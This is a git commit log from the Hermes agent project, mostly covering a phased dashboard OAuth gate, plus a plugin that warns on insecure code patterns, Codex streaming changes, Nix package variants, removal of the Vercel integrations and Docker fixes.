Ben b69fce9c86 feat(dashboard-auth): single-use WS tickets + POST /api/auth/ws-ticket
Phase 5 task 5.1. Browsers cannot set Authorization on a WebSocket
upgrade, so in gated mode the SPA needs an alternative way to bind the
upgrade to its authenticated session.

  hermes_cli/dashboard_auth/ws_tickets.py — in-memory single-use ticket
  store with 30s TTL. Thread-safe (threading.Lock), token_urlsafe(32)
  values, ticket value truncated to 8 chars in error messages for log
  hygiene. Module-level state with _reset_for_tests() helper.
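
A minimal sketch of such a store, assuming a plain dict guarded by a lock and an "expired once now >= expiry" boundary. The function names, the `now` parameter (added here for testability), and the use of KeyError are assumptions, not the ws_tickets.py API.

```python
import secrets
import threading
import time
from typing import Optional

TTL_SECONDS = 30  # TTL stated in the commit message
_lock = threading.Lock()
_tickets = {}  # ticket -> (user_id, expires_at)


def mint_ticket(user_id: str, now: Optional[float] = None) -> str:
    """Create a fresh random ticket bound to user_id."""
    now = time.monotonic() if now is None else now
    ticket = secrets.token_urlsafe(32)
    with _lock:
        _tickets[ticket] = (user_id, now + TTL_SECONDS)
    return ticket


def consume_ticket(ticket: str, now: Optional[float] = None) -> str:
    """Return the bound user_id; a ticket can be consumed at most once."""
    now = time.monotonic() if now is None else now
    with _lock:
        entry = _tickets.pop(ticket, None)  # pop is what makes it single-use
    if entry is None:
        # Only the first 8 characters appear in the message, for log hygiene.
        raise KeyError(f"unknown or already-used ticket {ticket[:8]}...")
    user_id, expires_at = entry
    if now >= expires_at:
        raise KeyError(f"expired ticket {ticket[:8]}...")
    return user_id
```

Popping under the lock means two concurrent consumers of the same ticket cannot both succeed.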

  hermes_cli/dashboard_auth/routes.py — adds POST /api/auth/ws-ticket.
  Auth-required (the gate middleware already attaches Session to
  request.state.session). Returns {ticket, ttl_seconds}; emits
  WS_TICKET_MINTED audit event with user_id + provider + ip.

  hermes_cli/dashboard_auth/audit.py — adds WS_TICKET_REJECTED enum
  value for the consume-side rejection event (wired into the WS
  endpoints in task 5.2).

11 new tests covering round-trip, single-use, TTL boundary, unknown
ticket rejection, secret-hygiene truncation in error messages, and
concurrent mint+consume from 20 threads.
2026-05-27 02:12:27 -07:00
Ben 848baeb0a8 feat(dashboard-auth): plugins/dashboard_auth/nous — contract-compliant Nous OAuth provider
Bundled, kind=backend, auto-loads. Activates ONLY when Portal-injected
env vars are present:

  HERMES_DASHBOARD_OAUTH_CLIENT_ID  — agent:{instance_id}
  HERMES_DASHBOARD_PORTAL_URL       — Portal base URL

Loopback / --insecure operators leave both unset and never see this
plugin register anything. The fail-closed branch in start_server handles
the 'public bind + zero providers' case independently.

Implementation follows nous-account-service PR #180's published OAuth
contract verbatim:

  - client_id is per-instance (agent:{instance_id}); the suffix is
    cross-checked against the token's agent_instance_id claim as
    defense-in-depth (contract C9).
  - scope is agent_dashboard:access only (contract C3).
  - aud is the bare client_id, no hermes-cli: prefix (contract C2).
  - RS256 JWT verification against /.well-known/jwks.json with
    5-minute cache (contract C7).
  - No refresh tokens in V1: refresh_session always raises
    RefreshExpiredError; revoke_session is a no-op (contract C5).
  - oauth_contract_version claim: missing → warn + proceed; present
    and != 1 → refuse (contract C11, OQ-C2 tolerant treatment).
  - redirect_uri validated client-side as defense before bouncing to
    Portal; authoritative check is server-side per agent-redirect-uri.ts.
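
The claim checks in the list above (C2, C9, C11) might look roughly like this once the JWT signature has been verified and decoded into a dict. The function name, the logger name, and the choice of ValueError are hypothetical; the real provider likely raises its own exception types, and this sketch assumes a string-valued `aud`.

```python
import logging

log = logging.getLogger("dashboard_auth.nous_sketch")  # hypothetical logger name
SUPPORTED_CONTRACT_VERSION = 1


def check_claims(claims: dict, client_id: str) -> None:
    """Raise ValueError on a contract violation; return None when acceptable."""
    # C2: aud is the bare client_id, with no 'hermes-cli:' prefix.
    if claims.get("aud") != client_id:
        raise ValueError("aud must be the bare client_id")
    # C9: the client_id suffix must match the agent_instance_id claim.
    prefix = "agent:"
    if not client_id.startswith(prefix):
        raise ValueError("client_id must look like agent:{instance_id}")
    if claims.get("agent_instance_id") != client_id[len(prefix):]:
        raise ValueError("agent_instance_id does not match client_id suffix")
    # C11: missing version warns and proceeds; any value other than 1 refuses.
    version = claims.get("oauth_contract_version")
    if version is None:
        log.warning("token has no oauth_contract_version claim; proceeding")
    elif version != SUPPORTED_CONTRACT_VERSION:
        raise ValueError(f"unsupported oauth_contract_version: {version!r}")
```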

41 new tests covering construction, plugin-entry env gating, start_login
shape, complete_login httpx-mocked happy path + error mapping,
verify_session JWT verification (RSA keypair fixture, full claim-check
matrix), refresh_session always raising, revoke_session no-op.

PyJWT + cryptography are already in the venv (jose was previously
suggested; switched to pyjwt[crypto] since the latter is already
pulled in transitively).
2026-05-27 02:12:27 -07:00
Ben 53999b9e95 docs(dashboard-auth): plan v2 — incorporate Portal OAuth contract (PR #180)
Adds a 'Contract Anchor' section at the top of the plan summarizing the
11 material findings from nous-account-service PR #180's published
contract. Rewrites Phase 4 (Nous provider) and Phase 6 (re-auth UX)
in-place; the v1 drafts are preserved inline marked 'rejected —
preserved for archeology' for reviewer context.

Phases 0–3 (already shipped) are unaffected — they set up gate
engagement and cookie plumbing only. The cookies module's RT cookie
becomes dead in Phase 6 task 6.3 and is removed there.

Key contract-driven reversals:
  - client_id is per-instance (agent:{id}), env-injected — not static
  - audience is bare client_id, not 'hermes-cli:' prefixed
  - scope is 'agent_dashboard:access' only
  - JWT claims do NOT include email/name — surface user_id instead
  - no refresh tokens in V1 — 401 → redirect to /login
  - JWKS-only verification, no userinfo fallback
  - redirect_uri is exact-match per AgentInstance, not wildcard

Phase 7's AuthWidget needs to display user_id (truncated) instead of
email; one-line annotation added at the top of that phase.
2026-05-27 02:12:27 -07:00
Ben 53736b3922 feat(dashboard-auth): fail-closed on no providers; proxy_headers when gated; suppress _SESSION_TOKEN injection
Phase 3, Task 3.5. Three changes to web_server.py:

  1. start_server replaces the legacy SystemExit-refusing-to-bind guard
     with: if app.state.auth_required and no providers registered, exit
     with a clear message; otherwise log the gate-on banner. --insecure
     keeps its existing behaviour.

  2. uvicorn proxy_headers flag is computed from app.state.auth_required.
     Loopback / --insecure keep it False (so _ws_client_is_allowed sees
     the real peer for the loopback gate); gated mode flips it True so
     X-Forwarded-Proto from Fly's TLS terminator is honoured for cookie
     Secure-flag decisions in detect_https().

  3. _serve_index no longer injects window.__HERMES_SESSION_TOKEN__ when
     the gate is on — the SPA reads identity from /api/auth/me using
     cookie auth instead. window.__HERMES_AUTH_REQUIRED__ flag lets the
     SPA pick between ticket-auth (gated) and token-auth (loopback) for
     /api/pty + /api/ws (Phase 5 will wire this in the React layer).

4 new behavioural tests; loopback regression harness still green.
2026-05-27 02:12:27 -07:00
Ben 5b17eab67a feat(dashboard-auth): auth gate middleware + /auth/* routes + /login HTML
Phase 3, Tasks 3.2 + 3.3 + 3.4. These three pieces are mutually
dependent so they land together.

middleware.py - gated_auth_middleware engages when app.state.auth_required
is True.  Allowlists /login, /auth/*, /api/auth/providers, and static
asset paths; everything else demands a valid session_at cookie.  Verifies
by trying every registered provider's verify_session in turn (multi-
provider stack); attaches verified Session to request.state.session.
Returns 401 JSON for /api/* and 302 -> /login for HTML.  ProviderError
during verify -> 503.

routes.py - APIRouter with:
  GET  /login              server-rendered HTML
  GET  /auth/login?provider=N  302 to IDP + PKCE cookie
  GET  /auth/callback?code,state  completes login, sets session cookies
  POST /auth/logout        clears cookies + best-effort revoke
  GET  /api/auth/providers public bootstrap endpoint (503 if zero)
  GET  /api/auth/me        verified session as JSON (auth-required)

login_page.py - Inline-CSS HTML template, no React, no JavaScript.

web_server.py - Mounted gated_auth_middleware between host_header and
auth_middleware (FastAPI runs middlewares in registration order: host
check -> cookie auth -> token auth).  auth_middleware short-circuits
when auth_required so cookie auth is authoritative in gated mode.
Router is included before mount_spa so the catch-all doesn't swallow
/login or /auth/*.

17 new behavioural tests; loopback regression harness still green.
2026-05-27 02:12:27 -07:00
Ben a30c4d8ebd feat(dashboard-auth): cookie helpers for session_at/session_rt/pkce
Phase 3, Task 3.1. Three cookies:
  - hermes_session_at: OAuth access token (HttpOnly, TTL = token TTL)
  - hermes_session_rt: OAuth refresh token (HttpOnly, 30d max-age)
  - hermes_session_pkce: PKCE state + verifier + provider hint (10min)

All SameSite=Lax + Path=/. Secure flag is set ONLY when the request
scheme is https — uvicorn proxy_headers=True (enabled in gated mode at
Phase 3.5) rewrites scheme from X-Forwarded-Proto so Fly's TLS
terminator works.
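
As an illustration of the attribute rules above, here is a sketch using the standard library's http.cookies. The helper name `build_cookie` and its parameters are hypothetical, and the real module presumably sets cookies through the web framework's response object instead.

```python
from http.cookies import SimpleCookie


# Hypothetical helper; renders one Set-Cookie header value.
def build_cookie(name: str, value: str, max_age: int, scheme: str) -> str:
    jar = SimpleCookie()
    jar[name] = value
    morsel = jar[name]
    morsel["path"] = "/"
    morsel["samesite"] = "Lax"
    morsel["httponly"] = True
    morsel["max-age"] = max_age
    if scheme == "https":
        # Secure only when the (possibly proxy-rewritten) scheme is https.
        morsel["secure"] = True
    return morsel.OutputString()
```

Keying Secure off the request scheme keeps plain-http loopback working while still marking cookies Secure behind a TLS terminator.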
2026-05-27 02:12:27 -07:00
Ben 628a52fce2 test(dashboard-auth): stub auth provider for E2E gate testing
Phase 2, Task 2.1. Self-contained fake IDP — start_login redirects
straight back to {redirect_uri}?code=stub_code&state=<s> so tests can
walk the OAuth round trip in-process. Tokens are HMAC-signed JSON blobs
(not real JWTs) — enough structure for verify_session to detect tamper
and expiry without pulling in pyjwt.

Lives in tests/ only — never registered as a real plugin. Phase 3's
end-to-end tests import StubAuthProvider directly.

Convention: exp <= now counts as expired (TTL=0 means born-expired)
— matches what Phase 6's silent-refresh test will need.
2026-05-27 02:12:27 -07:00
Ben 865cae4f61 feat(dashboard-auth): json-lines audit log at $HERMES_HOME/logs/dashboard-auth.log
Phase 1, Task 1.4. Records every auth event (login start/success/failure,
logout, refresh success/failure, revoke, session verify failure, WS
ticket mint) as one JSON object per line. Token-like kwargs (access_token,
refresh_token, code, code_verifier, state, ticket, cookie, Authorization)
are dropped before serialisation so the log never contains live secrets.

Write failures log at WARNING but never raise — auth flows must not fail
because the audit logger broke.
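
A minimal sketch of a JSON-lines writer with the two properties described above: secret-like fields are dropped, and write failures never propagate. The function name `audit`, the `ts` field, and the logger name are assumptions rather than the audit.py API.

```python
import json
import logging
import time
from pathlib import Path

# Field names taken from the commit message, compared case-insensitively.
_SECRET_KEYS = {
    "access_token", "refresh_token", "code", "code_verifier",
    "state", "ticket", "cookie", "authorization",
}
log = logging.getLogger("dashboard_auth.audit_sketch")  # hypothetical name


def audit(path: Path, event: str, **fields) -> None:
    """Append one JSON object per line; never raise on I/O failure."""
    record = {"ts": time.time(), "event": event}
    record.update(
        {k: v for k, v in fields.items() if k.lower() not in _SECRET_KEYS}
    )
    try:
        path.parent.mkdir(parents=True, exist_ok=True)
        with path.open("a", encoding="utf-8") as fh:
            fh.write(json.dumps(record, default=str) + "\n")
    except OSError as exc:
        log.warning("audit log write failed: %s", exc)
```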
2026-05-27 02:12:27 -07:00
Ben c32b17f557 feat(plugins): add register_dashboard_auth_provider hook on PluginContext
Phase 1, Task 1.3. Mirrors the existing register_image_gen_provider
pattern (plugins.py:531) — wrong-type or duplicate-name registrations
log at WARNING and silently return rather than raising, so a misbehaving
auth plugin cannot crash the host.

Deviation from plan: the plan's draft raised TypeError on non-provider
input; switched to silent-warn to match the established image_gen
convention. Test updated to match.
2026-05-27 02:12:27 -07:00
Ben 1bbfed70c4 test(dashboard-auth): cover registry register/get/list/clear semantics
Phase 1, Task 1.2. Verifies registration order is preserved, duplicate
names are rejected with ValueError, and non-compliant providers fail at
register time (not later when the middleware tries to dispatch).
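
The registry semantics under test can be sketched as below. The `name` attribute and the TypeError for non-compliant providers are assumptions; the commit only states that duplicates raise ValueError and that non-compliant providers fail at register time.

```python
import threading

_lock = threading.Lock()
_providers = {}  # plain dicts preserve insertion (registration) order

# The five abstract methods named for DashboardAuthProvider.
REQUIRED_METHODS = (
    "start_login", "complete_login", "verify_session",
    "refresh_session", "revoke_session",
)


def register(provider) -> None:
    name = getattr(provider, "name", None)  # assumed attribute
    missing = [m for m in REQUIRED_METHODS
               if not callable(getattr(provider, m, None))]
    if not isinstance(name, str) or not name or missing:
        raise TypeError(f"non-compliant provider (missing: {missing})")
    with _lock:
        if name in _providers:
            raise ValueError(f"provider {name!r} already registered")
        _providers[name] = provider


def list_providers() -> list:
    with _lock:
        return list(_providers.values())


def clear() -> None:
    with _lock:
        _providers.clear()
```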
2026-05-27 02:12:27 -07:00
Ben 2dc6d03a3d feat(dashboard-auth): define DashboardAuthProvider ABC + Session dataclass
Phase 1, Task 1.1. New package hermes_cli/dashboard_auth/ contains:

  base.py     - DashboardAuthProvider ABC with 5 abstract methods
                (start_login, complete_login, verify_session,
                refresh_session, revoke_session), Session + LoginStart
                frozen dataclasses, three exception types
                (ProviderError / InvalidCodeError / RefreshExpiredError),
                and assert_protocol_compliance() for plugins to call
                in their own tests.
  registry.py - Module-level register/get/list/clear with a lock.

Nothing reads the registry yet — Phase 2 adds the StubAuthProvider and
Phase 3 wires the gate middleware. The plugin hook lands in Task 1.3.
2026-05-27 02:12:27 -07:00
Ben 949ad95e4b feat(dashboard): stash auth_required flag on app.state
Phase 0, Task 0.3. start_server now computes should_require_auth(host,
allow_public) and records it on app.state.auth_required BEFORE the
existing legacy SystemExit guard fires. This gives middleware, the SPA
token-injection path, and WS endpoints a consistent read source for
'is the gate active'. The flag is set but no one reads it yet — Phase 3
registers the gate middleware.

Note: 4 pre-existing test failures in tests/hermes_cli/test_web_server.py
(PtyWebSocket) + test_update_hangup_protection.py reproduce on pristine
HEAD and are unrelated to this change (starlette TestClient WS regression).
2026-05-27 02:12:27 -07:00
Ben 8773bbf186 feat(dashboard): add should_require_auth predicate for OAuth gate
Phase 0, Task 0.2. Single source of truth for 'is the auth gate active?'.
Reuses the existing _LOOPBACK_HOST_VALUES frozenset so this stays in sync
with the DNS-rebinding host-header check. RFC1918/CGNAT/link-local are
treated as public — exact threat model the gate exists for.
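
A sketch of what such a predicate could look like. The contents of the frozenset and the reading of `allow_public` as "the operator passed --insecure, so the gate stays off" are assumptions; the real values live in web_server.py.

```python
# Hypothetical contents; the real _LOOPBACK_HOST_VALUES may list other spellings.
_LOOPBACK_HOST_VALUES = frozenset({"127.0.0.1", "localhost", "::1"})


def should_require_auth(host: str, allow_public: bool) -> bool:
    """True when the dashboard bind is public and the gate must engage."""
    if allow_public:  # assumed to mirror --insecure
        return False
    # Anything not literally loopback counts as public, including
    # RFC1918, CGNAT, and link-local addresses.
    return host.strip().lower() not in _LOOPBACK_HOST_VALUES
```

Checking membership in a fixed set, rather than classifying address ranges, is what makes private-network binds fall on the public side by default.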
2026-05-27 02:12:27 -07:00
Ben f2b479e7a2 test(dashboard): pin current loopback auth behavior as regression harness
Phase 0, Task 0.1 of the dashboard-oauth plan. Establishes a baseline for
the loopback dashboard's auth surface so future phases can prove they
didn't regress the existing _SESSION_TOKEN flow when adding the OAuth gate.
2026-05-27 02:12:27 -07:00
Teknium 249534e472 plugins: add security-guidance — pattern-matched warnings on dangerous code writes (#33131)
New opt-in plugin that scans the content passed to write_file / patch /
skill_manage for 25 known-dangerous code patterns — pickle.load,
yaml.load, eval(, os.system, subprocess(shell=True), child_process.exec,
dangerouslySetInnerHTML, innerHTML/outerHTML/document.write/
insertAdjacentHTML, crypto.createCipher (no IV), AES ECB,
TLS verification disabled, XXE-prone xml.etree/minidom parsers,
<script src=//...> without SRI, torch.load without weights_only=True,
GitHub Actions ${{ github.event.* }} injection — and appends a
"Security guidance" warning block to the tool result via the
transform_tool_result hook.

Default behaviour is non-blocking: the file is written and the warning
rides back to the model in the next turn so it can self-correct or
document why the construct is safe. SECURITY_GUIDANCE_BLOCK=1 upgrades
to refusing the write entirely; SECURITY_GUIDANCE_DISABLE=1 is the
kill switch.

Pattern data (patterns.py) is a verbatim Apache-2.0 fork of
Anthropic's claude-plugins-official/plugins/security-guidance/hooks/
patterns.py at commit 0bde168 (2026-05-26). LICENSE and NOTICE
preserve attribution. The Hermes-side plugin glue (__init__.py,
plugin.yaml, README.md, tests) is original work.

Plugin is opt-in like all bundled plugins:
  hermes plugins enable security-guidance

Inspired by https://x.com/ClaudeDevs/status/1927108527247... — Anthropic
shipped this as their security-guidance plugin for Claude Code on
2026-05-26 with a measured 30-40% reduction in security-related PR
comments on internal rollout.

What's NOT ported (deferred):
  * Layer 2 (LLM diff review on turn end) — would route through main
    model by default on Hermes, real money on reasoning models. A
    follow-up can wire it to a cheap aux model with explicit opt-in.
  * Layer 3 (agentic commit-time review) — agent can run this on
    demand via delegate_task today.
  * .hermes/security-guidance.md project-rules file — only used by
    layers 2/3 upstream.
2026-05-27 02:07:21 -07:00
Teknium c752205635 chore(release): map superearn-fisher noreply for #33122 salvage 2026-05-27 02:06:21 -07:00
SuperEarn 4920f8437f test(codex): cover null output stream terminal events 2026-05-27 02:06:21 -07:00
orcool f0fdb5e67d feat(catalog): add qwen3.7-max to alibaba + alibaba-coding-plan model lists
Alibaba's latest flagship Qwen model is released but not yet present in the
DashScope (alibaba) or Alibaba Coding Plan curated catalogs.  Add it so it
shows up in the /model picker and setup wizard for those providers.

OpenCode Go routing for qwen3.7-max already landed via #32780 (commit 2fc77c53f).
OpenRouter + Nous catalog entries already landed via #32809 (commit ccd3d04fc).
This salvage picks up the remaining alibaba / alibaba-coding-plan entries from
#32806 — the AI Gateway entry is dropped because Vercel AI Gateway was removed
in #33067.
2026-05-27 02:05:58 -07:00
Teknium 96223265b9 chore(api-server): mark skills_api capability True now that /v1/skills shipped
#33016 added GET /v1/skills + /v1/toolsets on the API server; the
capability flag introduced in this branch was placeholder-False. Flip
to True so capability probers see the truth.
2026-05-27 01:56:55 -07:00
Jonathan 464b51d455 Support media in session chat API 2026-05-27 01:56:55 -07:00
Bailey Dixon f7527b0fdb feat: add API server session controls 2026-05-27 01:56:55 -07:00
Teknium f0be32232d chore(release): map EvilHumphrey noreply for #33034 salvage 2026-05-27 01:52:34 -07:00
EvilHumphrey 4243b6dc45 fix(codex): update silent-hang workaround hint 2026-05-27 01:52:34 -07:00
Siddharth Balyan 976979489a feat(nix): add #messaging and #full package variants (#33108)
* fix(plugins/discord): correct install_hint extra to [messaging]

The Discord platform registered install_hint pointing at
'hermes-agent[discord]', but pyproject.toml has no [discord] extra —
the deps live in [messaging] alongside Telegram and Slack. Users hitting
"Platform 'Discord' requirements not met" were directed at a pip command
that installs nothing.

* feat(nix): add #messaging and #full package variants

Make Discord/Telegram/Slack work out of the box for `nix profile install`
users. Messaging deps were dropped from [all] on 2026-05-12 in favor of
lazy-install, but lazy-install can't write to the read-only /nix/store —
users hit "No adapter available for discord" with no actionable guidance.

  - #messaging: pre-built with discord.py/telegram/slack (+33 MB venv)
  - #full:      all 18 platform-portable extras + matrix on Linux only
                (python-olm lacks Darwin PyPI wheels) (+738 MB venv)

Also adds a `messaging-variant` flake check that verifies `import discord`
succeeds in the sealed venv — regression guard for the lazy-install
migration.

Docs updated: Quick Start callout, extraDependencyGroups rewrite with
messaging as primary example + full extras table, troubleshooting row,
cheatsheet row.

Closure size deltas (measured x86_64-linux):
  default   1792 MB pkg / 512 MB venv
  messaging 1826 MB pkg / 546 MB venv   (+33 MB)
  full      2530 MB pkg / 1250 MB venv  (+738 MB)

* chore(nix): trim variant comments + alphabetize full extras

Drop the date-stamped changelog from messaging-variant's comment and the
"+33 MB / +704 MB" numbers from the variant defs — those drift and belong
in the PR description, not source. Alphabetize the 18-extra list in #full
so future additions produce clean one-line diffs.

No semantic change. messaging-variant check still passes.
2026-05-27 14:15:39 +05:30
Teknium 25f43d38de feat(api-server): add GET /v1/skills and /v1/toolsets (#33016)
Lets external clients enumerate the agent's skills and resolved toolsets
deterministically over the OpenAI-compatible API server, without standing
up the dashboard web server or sending a chat message and asking the model
to list them.

- GET /v1/skills — list installed skills (name, description, category)
- GET /v1/toolsets — list toolsets resolved for the api_server platform,
  with enabled/configured state and the concrete tool names each expands
  to
- Both gated by API_SERVER_KEY (same Bearer scheme as every other /v1/*
  endpoint)
- /v1/capabilities advertises both new endpoints

Closes the gap a community user just hit asking how to list skills over
REST when only the OpenAI-compatible server is running.

Test plan
- python -m pytest tests/gateway/test_api_server.py -k "Skills or Toolsets or Capabilities" -o 'addopts=' -q
  → 9/9 pass
- python -m pytest tests/gateway/test_api_server.py -o 'addopts=' -q
  → 156/156 pass, no regressions
- E2E: started a real adapter on an isolated HERMES_HOME with a fake
  skill installed; curl-equivalent calls to /v1/capabilities,
  /v1/skills, /v1/toolsets returned the expected JSON; with
  API_SERVER_KEY configured, unauthenticated calls returned 401.
2026-05-27 01:27:26 -07:00
Teknium febc4cfec0 remove Vercel AI Gateway and Vercel Sandbox (#33067)
* remove Vercel AI Gateway provider and Vercel Sandbox terminal backend

Both Vercel-hosted integrations are removed end-to-end. Users on the AI
Gateway should switch to OpenRouter or one of the other aggregators
(Nous Portal, Kilo Code). Users on the Vercel Sandbox backend should
switch to Docker, Modal, Daytona, or SSH.

What's removed:
- `plugins/model-providers/ai-gateway/` provider plugin
- `hermes_cli/vercel_auth.py` Vercel-Sandbox auth helper
- `tools/environments/vercel_sandbox.py` terminal backend
- `ai-gateway` provider wiring across auth, doctor, setup, models,
  config, status, providers, main, web_server, model_normalize, dump
- `vercel_sandbox` backend wiring across terminal_tool, file_tools,
  code_execution_tool, file_operations, approval, skills_tool,
  environments/local, credential_files, lazy_deps, prompt_builder,
  cli, gateway/run
- `AI_GATEWAY_BASE_URL` constant, `_AI_GATEWAY_HEADERS` auxiliary-client
  header set, run_agent base-URL header/reasoning special-cases
- `[vercel]` pyproject extra and `vercel`/`vercel-workers` from uv.lock
- env vars: `AI_GATEWAY_API_KEY`, `AI_GATEWAY_BASE_URL`, `VERCEL_TOKEN`,
  `VERCEL_PROJECT_ID`, `VERCEL_TEAM_ID`, `VERCEL_OIDC_TOKEN`,
  `TERMINAL_VERCEL_RUNTIME`
- Tests: deletes test_ai_gateway_models.py and
  test_vercel_sandbox_environment.py; scrubs references across 23
  surviving test files (no entire tests deleted unless they were
  dedicated to AI Gateway / Sandbox)
- Docs: provider tables, env-var reference, setup guides, security
  notes, tool config, terminal-backend tables — English plus zh-Hans
  i18n parity
- `hermes-agent` skill: provider table entry and remote-backend list

What stays (intentional):
- `popular-web-designs/templates/vercel.md` — CSS design reference,
  unrelated to Vercel-the-AI-product
- `x-vercel-id` in `stream_diag.py` headers — generic Vercel CDN
  response header, useful diag signal on any Vercel-hosted endpoint
- `vercel-labs/agent-browser` URL in browser config — lightpanda
  browser project, different OSS effort
- `userStories.json` historical contributor entry mentioning Vercel
  Sandbox — archive, not active docs

Validation:
- 1153 tests in the 22 targeted files pass (`scripts/run_tests.sh`)
- Full repo `py_compile` clean
- Live import of every touched module + invariant check (no
  `ai-gateway` in `PROVIDER_REGISTRY`, no `_AI_GATEWAY_HEADERS`, no
  `vercel_sandbox` in `_REMOTE_TERMINAL_BACKENDS`)

* test: convert profile-count check from change-detector to invariant

The hardcoded "== 34" assertion broke when ai-gateway was removed.
Per AGENTS.md change-detector-test guidance, assert the relationship
(registry count >= number of plugin dirs) instead of a literal count.
Counts shift when providers are added/removed; that's expected.
2026-05-27 00:43:32 -07:00
Teknium cb38ce28cb refactor(codex): drop SDK responses.stream() helper; consume events directly (#33042)
* refactor(codex): drop SDK responses.stream() helper; consume events directly

The OpenAI Python SDK's high-level `client.responses.stream(...)` helper
does post-hoc typed reconstruction from the terminal
`response.completed.response.output` field.  The chatgpt.com Codex
backend has been observed (today, gpt-5.5) to ship `response.output =
null` on terminal frames, which crashes the SDK with `TypeError:
'NoneType' object is not iterable` mid-iteration.

Carlton's #32963 patched the symptom by wrapping the helper in
try/except and recovering from the same per-event accumulator the SDK
was supposed to populate.  This PR removes the helper from the call
path entirely: we now use `client.responses.create(stream=True)` (raw
AsyncIterable of SSE events) and assemble the final response object
ourselves from `response.output_item.done` events as they arrive.  The
terminal event's `output` field is never read for content.  Same
strategy OpenClaw uses for the same backend.

This makes Hermes structurally immune to the bug class rather than patched against one symptom.
The next time OpenAI ships a shape change to chatgpt.com's terminal
frame, our consumer keeps working because it doesn't read that frame
for content — only for usage/status/id.

Changes
- `agent/codex_runtime.py`: new `_consume_codex_event_stream()` shared
  consumer; `run_codex_stream()` uses `responses.create(stream=True)`;
  `run_codex_create_stream_fallback()` collapses into a thin alias
  since the primary path now does what the fallback used to do.
- `agent/auxiliary_client.py`: `_CodexCompletionsAdapter` uses the
  same consumer; old null-output recovery helpers deleted as
  unreferenced.
- Tests migrated: fixtures that mocked `responses.stream` now mock
  `responses.create` returning a raw iterable.  New regression test
  asserts the auxiliary path returns streamed items even when the
  terminal event's `output` is literally `null`.

Validation
- Live: tested against fresh OAuth on `chatgpt.com/backend-api/codex`
  with `gpt-5.5` — response built correctly with `response.output=null`
  on the terminal frame, all events consumed, usage/reasoning tokens
  propagated.
- `tests/run_agent/test_run_agent_codex_responses.py` +
  `tests/agent/test_auxiliary_client.py`: 242 passed.

* test+fix(codex): migrate streaming tests, raise on truncated streams

CI surfaced 10 test failures across tests/run_agent/test_streaming.py
and tests/run_agent/test_codex_xai_oauth_recovery.py — both files had
their own `responses.stream(...)` mocks I missed in the first sweep.

agent/codex_runtime.py: _consume_codex_event_stream() now raises
"Codex Responses stream did not emit a terminal response" when the
stream ends without any terminal frame AND no usable content. This
preserves the signal callers used to get from the SDK's high-level
helper, which they distinguished from "completed with empty body"
in error handling.
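
The consumption strategy described in this PR can be sketched as follows, with events modelled as plain dicts for self-containment. The function name and return shape are hypothetical, and only `response.completed` is treated as terminal here; the real `_consume_codex_event_stream()` works on SDK event objects and handles more cases.

```python
from typing import Iterable


# Hypothetical stand-in for _consume_codex_event_stream().
def consume_events(events: Iterable[dict]) -> dict:
    items = []
    terminal = None
    for event in events:
        etype = event.get("type")
        if etype == "response.output_item.done":
            items.append(event["item"])  # content is assembled from these
        elif etype == "response.completed":
            terminal = event.get("response") or {}
    if terminal is None and not items:
        # Truncated stream: no terminal frame and nothing usable.
        raise RuntimeError(
            "Codex Responses stream did not emit a terminal response"
        )
    terminal = terminal or {}
    # The terminal frame supplies id/status/usage only; its `output`
    # field is never read, so a null there is harmless.
    return {
        "id": terminal.get("id"),
        "status": terminal.get("status"),
        "usage": terminal.get("usage"),
        "output": items,
    }
```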

Tests migrated:
- test_streaming.py: text-delta callback, activity-touch, and
  remote-protocol-error tests all switch from mocking responses.stream
  to responses.create returning an iterable of events.
- test_codex_xai_oauth_recovery.py: prelude-error tests are recast as
  wire-error-event tests (the new path raises _StreamErrorEvent
  directly when the wire emits type=error, which is strictly better
  than the old two-phase "SDK RuntimeError → retry → fallback"). The
  retry-on-transport-error test moves from responses.stream side-effect
  to responses.create side-effect.

Verified live against chatgpt.com Codex with gpt-5.5 — AIAgent.chat()
through the full codex_responses path returns correctly, 319/319
targeted tests passing.
2026-05-27 00:30:06 -07:00
Ben fb298a958c fix(docker): mkdir HERMES_HOME as root in stage2 before chown / privilege drop (#18488)
When HERMES_HOME points at a custom path whose parent directories
only root can create (e.g. HERMES_HOME=/home/hermes/.hermes in a
Compose file, or any path under a fresh / not pre-populated by the
image), stage2-hook.sh fails on first boot:

  [stage2] Warning: chown failed (rootless container?) - continuing
  mkdir: cannot create directory '/custom': Permission denied
  mkdir: cannot create directory '/custom': Permission denied
  ... (one per s6-setuidgid hermes mkdir invocation)
  cont-init: info: /etc/cont-init.d/01-hermes-setup exited 1

The mkdirs fail because s6-setuidgid drops to hermes (UID 10000)
before invoking mkdir -p, and the runtime user has no permission to
create root-owned ancestor directories. 02-reconcile-profiles then
crashes with FileNotFoundError, .install_method never lands, and
the container limps on in a half-initialized state.

Bootstrap HERMES_HOME with mkdir -p while still root, before the
ownership normalization. Idempotent on the default /opt/data path
(directory already exists from the Dockerfile RUN mkdir -p) and on
any subsequent restart. (#18482)

Retargeted from the original PR's docker/entrypoint.sh (now a
deprecated shim) to docker/stage2-hook.sh where the related chown
logic moved during the s6-overlay rework.

Co-authored-by: wpengpeng168 <133926080+wpengpeng168@users.noreply.github.com>
2026-05-27 17:16:40 +10:00
Ben c3bdb2af37 ci(docker): add shellcheck shell=sh directive to main-wrapper.sh
shellcheck doesn't recognize the s6-overlay `#!/command/with-contenv sh`
shebang and aborts with SC1008 ("This shebang was unrecognized. ShellCheck
only supports sh/bash/dash/ksh/'busybox sh'. Add a 'shell' directive to
specify."). The error fires at --severity=error too, so it fails the
"Docker / shell lint" CI job on every PR that touches docker/.

Add the canonical `# shellcheck shell=sh` directive — same fix already
applied to the sibling cont-init.d scripts (`02-reconcile-profiles` and
`015-supervise-perms`) when they adopted the with-contenv shebang.

The shebang was changed from `#!/bin/sh` → `#!/command/with-contenv sh`
in PR #32412 (commit 29c71e9) to fix env-propagation through s6's PID 1.
The shellcheck-directive line was missed in that PR; this patches it.

Reproduces locally:
  docker run --rm -v "$PWD:/mnt" -w /mnt koalaman/shellcheck:stable \
    --severity=error --format=gcc docker/main-wrapper.sh

Before:  docker/main-wrapper.sh:1:1: error: [SC1008]  (rc=1)
After:   (no output)                                   (rc=0)

Script behavior is unchanged — the directive is a comment, and `sh -n`
/ `bash -n` parse the file cleanly either way.
2026-05-27 16:32:35 +10:00
Ben 27a29ee54e feat(docker): upgrade Node to 22 LTS via multi-stage from node:22-bookworm-slim (#4977)
Debian trixie's bundled `nodejs` package is pinned to 20.19.2, which
reached LTS EOL in April 2026. Trixie won't upgrade in place; Debian 14
(forky) — where the apt nodejs is 24.x — isn't released until ~mid-2027.

To stay on a supported LTS without waiting for Debian 14, copy node + npm
